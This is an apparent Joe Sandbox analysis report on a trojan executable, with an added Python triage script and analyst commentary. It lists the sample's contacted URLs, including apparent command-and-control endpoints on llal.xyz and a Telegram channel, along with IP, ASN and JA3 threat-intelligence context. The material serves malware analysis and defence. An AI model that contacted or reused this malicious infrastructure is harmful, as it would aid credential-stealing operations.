https://store.steampowered.com/steam_refunds/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://steamcommunity.com/profiles/76561199619938930V | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://api.steampowerW | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199619938930O | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://steamcommunity.com/workshop/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://login.steampowered.com/ | OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://store.steampowered.com/legal/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://recaptcha.net | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842db | OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | | high
https://store.steampowered.com/ | 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
http://127.0.0.1:27060 | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d3 | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://help.steampowered.com/ | OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.steampowered.com/ | OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/account/cookiepreferences/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype | OXoeX1Ii3x.exe | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/mobile | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
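Most of the URL table is the Steam profile page the sample fetched (the cached 76561199619938930[1].htm and the CDN assets it references); the rows worth an analyst's time are the ones whose host is not part of that page. The following Python script is an added example, not part of the Joe Sandbox report, that parses rows in the flattened form the report extraction produced (Name glued to Source, the Malicious cell glued onto the end), splits the columns back apart using the three artefact names that begin every Source cell in this report, and lists every host outside an assumed allowlist of Steam-related hosts. The allowlist is an analyst assumption, and the embedded rows are copied from the table above with their source lists shortened to one dump each.

```python
import re
from urllib.parse import urlsplit

# Rows copied from the report's URL table in the flattened form the extraction
# produced: Name and Source glued together, with the Malicious cell ("true"/
# "false") glued onto the end; the Antivirus Detection and Reputation cells
# follow as separate fields. Source lists are shortened to one dump per row.
SAMPLE_ROWS = [
    ("https://store.steampowered.com/steam_refunds/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse", "", "high"),
    ("https://steamcommunity.com/profiles/76561199619938930VOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse", "", "high"),
    ("https://api.steampowerWOXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse", "Avira URL Cloud: safe", "unknown"),
    ("https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dbOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse", "Avira URL Cloud: safe", "unknown"),
    ("http://upx.sf.netAmcache.hve.4.drfalse", "", "high"),
    ("http://127.0.0.1:27060OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmpfalse", "", "high"),
    ("https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltypeOXoeX1Ii3x.exefalse", "Avira URL Cloud: safe", "unknown"),
]

# Every Source cell in this report begins with one of these artefact names;
# the earliest occurrence marks where the glued Name column ends.
SOURCE_TOKENS = ("OXoeX1Ii3x.exe", "76561199619938930[1].htm.0.dr", "Amcache.hve.4.dr")

# Assumed allowlist (analyst assumption, not something the report states):
# hosts the sample's own Steam profile fetch legitimately references, the UPX
# banner string, and the local Steam client port.
EXPECTED_HOSTS = ("steampowered.com", "steamcommunity.com", "steamstatic.com",
                  "recaptcha.net", "upx.sf.net", "127.0.0.1")


def parse_row(glued, av_detection, reputation):
    """Split one flattened table row back into its five columns."""
    m = re.search(r"(true|false)$", glued)
    malicious = bool(m) and m.group(1) == "true"
    body = glued[: m.start()] if m else glued
    cut = min((body.find(t) for t in SOURCE_TOKENS if t in body), default=len(body))
    name, source = body[:cut], body[cut:]
    return {
        "name": name,
        "sources": source.split(", ") if source else [],
        "malicious": malicious,
        "av": av_detection or None,
        "reputation": reputation,
    }


def host_of(url):
    """Hostname of a memory string, tolerating truncated strings such as
    "https://api.steampowerW" and doubled schemes such as "https://https://t.me/"."""
    rest = re.sub(r"^(?:https?://)+", "", url, flags=re.IGNORECASE)
    return urlsplit("//" + rest).hostname or ""


def in_allowlist(host):
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)


def triage(rows=SAMPLE_ROWS):
    """Rows needing analyst attention: host outside the allowlist, or flagged
    malicious by the sandbox. Truncated fragments that cannot be matched are
    kept on purpose rather than silently dropped."""
    flagged = []
    for glued, av, reputation in rows:
        rec = parse_row(glued, av, reputation)
        rec["host"] = host_of(rec["name"])
        if rec["malicious"] or not in_allowlist(rec["host"]):
            flagged.append(rec)
    return flagged


def flagged_hosts(rows=SAMPLE_ROWS):
    return sorted({rec["host"] for rec in triage(rows)})


if __name__ == "__main__":
    for rec in triage():
        print(f'{rec["host"]:<18} rep={rec["reputation"]:<8} av={rec["av"]}  {rec["name"]}')
        print("    found in:", ", ".join(rec["sources"]))
```

On the sample rows the script surfaces llal.xyz and t.me, which are also the two hosts the report gives "unknown" reputation, plus the truncated api.steampowerW fragment, which cannot be matched against the allowlist and so is left for a human to dismiss rather than dropped by the script.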
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | llal.xyz | European Union | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1582973
                                                                                                                                                                                          Start date and time:2025-01-01 09:11:15 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 5m 38s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:OXoeX1Ii3x.exe
                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                          Original Sample Name:3e9881b9c6ff4994fc9d684456694e77.exe
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal84.troj.winEXE@2/6@2/2
                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
HCA (Hybrid Code Analysis) Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 92

Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212, 40.126.32.140, 4.175.87.197, 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Note that only 9 of 101 disassembled functions were reached during the run (the "Found large amount of non-executed APIs" signature above); the process crashed into WerFault.exe, so the static HCA view covers far more code than the dynamic trace does.

Simulations: No simulations
Context: IPs

Match: 188.114.96.3
Associated Sample Name / URL | Detection | Threat Name | Context
QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/u7ghXEYp/download
CV_ Filipa Barbosa.exe | malicious | FormBook | www.mffnow.info/1a34/
A2028041200SD.exe | malicious | FormBook | www.mydreamdeal.click/1ag2/
SWIFT COPY 0028_pdf.exe | malicious | FormBook | www.questmatch.pro/ipd6/
QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/I7fmQg9d/download
need quotations.exe | malicious | FormBook | www.rtpwslot888gol.sbs/jmkz/
QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/Bh1Kj4RD/download
http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/XrlEIxYp/download
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/XrlEIxYp/download

Match: 104.102.49.254
Associated Sample Name / URL | Detection | Threat Name | Context
r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm

Both addresses are shared by samples of unrelated families (Snake Keylogger, FormBook, Socks5Systemz), which is what you expect from CDN/anycast endpoints rather than dedicated C2; they are weak pivots on their own and should be combined with the domain and URL context before being used as indicators.
Context: Domains

Match: llal.xyz
Associated Sample Name / URL | Detection | Threat Name | Context
0x001900000002ab40-59.exe | malicious | Arc Stealer | 188.114.97.3

Match: steamcommunity.com
Associated Sample Name / URL | Detection | Threat Name | Context
Exlan_setup_v3.1.2.exe | malicious | LummaC | 104.102.49.254
Bootstrapper.exe | malicious | LummaC | 104.102.49.254
GPU-Z.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.102.49.254
gdi32.dll | malicious | LummaC | 23.55.153.106
Loader.exe | malicious | LummaC | 23.55.153.106
Crosshair-X.exe | malicious | LummaC | 104.121.10.34
iien1HBbB3.exe | malicious | LummaC | 23.55.153.106
oe9KS7ZHUc.exe | malicious | LummaC | 23.55.153.106
MPgkx6bQIQ.exe | malicious | LummaC | 23.55.153.106

Every prior steamcommunity.com sighting in this table is a LummaC sample, and 104.102.49.254 (one of the IPs above) is among the addresses it resolved to; the domain itself is legitimate, so the signal is the combination of a low-reputation domain query (llal.xyz) with a steamcommunity.com fetch from a non-browser process, not the domain alone.
Context: ASNs

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
vj0Vxt8xM4.exe | malicious | Unknown | 104.20.99.10
vj0Vxt8xM4.exe | malicious | Unknown | 104.20.99.10
dropper.exe | malicious | Unknown | 1.1.1.1
1.ps1 | malicious | Unknown | 172.67.144.62
https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix | 188.114.97.3
setup.exe | malicious | Unknown | 104.21.30.45
U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
rename_me_before.exe | malicious | Python Stealer, Exela Stealer | 162.159.128.233
Loader.exe | malicious | LummaC | 104.21.48.1

Match: AKAMAI-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
setup.exe | malicious | Unknown | 23.217.49.150
decrypt.exe | malicious | Unknown | 184.28.90.27
decrypt.exe | malicious | Unknown | 184.28.90.27
FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.102.34.241
decrypt.ps1 | malicious | Unknown | 184.28.90.27
EdYEXasNiR.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.102.49.254
Exlan_setup_v3.1.2.exe | malicious | LummaC | 104.102.49.254
https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 184.28.90.27
Bootstrapper.exe | malicious | LummaC | 104.102.49.254
Context: JA3 Fingerprints

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
0000000000000000.exe | malicious | Nitol | 104.102.49.254, 188.114.96.3
0000000000000000.exe | malicious | Unknown | 104.102.49.254, 188.114.96.3
1.ps1 | malicious | Unknown | 104.102.49.254, 188.114.96.3
setup.exe | malicious | Unknown | 104.102.49.254, 188.114.96.3
Let's_20Compress.exe | malicious | Unknown | 104.102.49.254, 188.114.96.3
CenteredDealing.exe | malicious | Vidar | 104.102.49.254, 188.114.96.3
CenteredDealing.exe | malicious | Vidar | 104.102.49.254, 188.114.96.3
LinxOptimizer.exe | malicious | Unknown | 104.102.49.254, 188.114.96.3
setup.msi | malicious | Unknown | 104.102.49.254, 188.114.96.3

The same JA3 hash appears on a PowerShell script, an MSI and executables attributed to Nitol and Vidar, so it identifies the TLS client stack the sandbox's Windows image uses rather than this malware family; do not deploy it as a family-specific network indicator.

Context: Dropped Files
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0180438971405563
Encrypted: false
SSDEEP: 192:rtsB7d6uq0CH0MnjenvJzuiFAZ24IO8+H:RsH6uxCUMnjIzuiFAY4IO8+H
MD5: 42045DF8D3A2A47425FB7C4B17525312
SHA1: 62A8B96E74EA284C634405543C6CF93BB9B35619
SHA-256: 2AACDA55F39517AAE835DAA92FA2F1AC4FAD659159C430A7AD407D6171EE94CA
SHA-512: B36E04D792185D0EAC4C97CF4870ADD847CB1D750013AA0A6C3302046A8C56147B4AE2252F303AD4EACCDCCCFEC978B3EF7375451F494782BE676893F80FA9FD
Malicious: true
Reputation: low
Preview (raw UTF-16LE bytes, null bytes and CRLF rendered as dots):
..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.9.2.7.2.7.1.9.9.5.6.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.9.2.7.2.7.7.1.5.1.9.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.6.7.1.7.4.d.-.e.0.f.b.-.4.f.6.2.-.a.5.5.1.-.e.f.3.4.d.0.0.7.3.e.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.5.6.5.1.a.b.-.5.0.7.2.-.4.0.b.d.-.8.c.4.2.-.8.d.e.8.c.f.9.c.7.8.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.X.o.e.X.1.I.i.3.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.2.c.-.0.0.0.1.-.0.0.1.4.-.5.6.4.7.-.3.2.d.7.2.4.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.2.2.9.7.b.9.5.8.7.7.0.8.4.1.d.b.f.2.e.5.a.9.0.4.5.1.5.b.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.3.7.0.2.4.4.6.6.9.d.a.e.a.5.f.8.7.c.7.9.7.d.6.a.d.2.4.0.a.d.b.f.b.7.0.0.6.3.8.4.!.O.X.o.e.X.1.I.i.3.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
Decoded preview (same bytes read as UTF-16LE; the preview is cut off after "TargetAppVer=2"):
Version=1
EventType=BEX
EventTime=133801927271995691
ReportType=2
Consent=1
UploadTime=133801927277151918
ReportStatus=524384
ReportIdentifier=f967174d-e0fb-4f62-a551-ef34d0073e2b
IntegratorReportIdentifier=6e5651ab-5072-40bd-8c42-8de8cf9c78e5
Wow64Host=34404
Wow64Guest=332
NsAppName=OXoeX1Ii3x.exe
AppSessionGuid=0000112c-0001-0014-5647-32d7245cdb01
TargetAppId=W:0006cc2297b958770841dbf2e5a904515b270000ffff!0000370244669daea5f87c797d6ad240adbfb7006384!OXoeX1Ii3x.exe
